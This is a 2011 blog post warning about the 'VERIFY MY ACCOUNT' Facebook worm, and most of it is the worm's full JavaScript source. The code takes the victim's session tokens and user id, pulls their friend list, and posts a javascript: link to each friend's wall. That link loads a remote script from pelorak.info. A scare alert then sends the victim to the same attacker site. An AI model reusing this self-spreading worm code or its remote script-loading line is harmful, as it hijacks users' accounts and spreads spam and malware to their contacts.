Thursday, May 12, 2011

Facebook worm spreading : ==VERIFY MY ACCOUNT==

In the past hour a new application has begun spreading on Facebook which has found an exploit in the existing sharing system. Whatever you do, don’t click the link described below.

The system is pretty straight forward. It suggests that you click “VERIFY MY ACCOUNT” within a link which ultimately results in the user posting the same message to all their friends’ walls. The message typically resembles the following one:

facebook worm
 here is the source code of the verify my account facebook worm:
var message = "Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest(); 
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); 
gf.send(); 
if(gf.readyState!=4){ }else{ 
data = eval('(' + gf.responseText.substr(9) + ')'); 
if(data.error){ }else{ 
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i<friends.length; i++){
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
"&post_form_id=" + post_form_id + 
"&fb_dtsg=" + fb_dtsg + 
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + 
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + 
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + 
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://pelorak.info/verify.php?js";



Here is a youtube video explaining the working of this facebook worm
Posted by at 5:24 AM
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)